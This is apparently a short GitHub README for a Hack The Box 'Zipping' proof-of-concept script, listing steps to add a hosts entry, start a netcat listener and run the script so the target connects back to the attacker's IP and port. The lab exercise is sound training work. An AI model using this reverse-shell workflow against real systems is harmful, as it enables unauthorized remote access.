Skip to content

Latest commit

 

History

History
7 lines (5 loc) · 217 Bytes

README.md

File metadata and controls

7 lines (5 loc) · 217 Bytes

HTB_Zipping

Usage: python3 HTB_Zipping_poc.py <listener ip> <listener port>

1. echo "10.10.11.229 zipping.htb" >> /etc/hosts

2. nc -nvlp 4444

3. python3 HTB_Zipping_poc.py 10.10.14.1 4444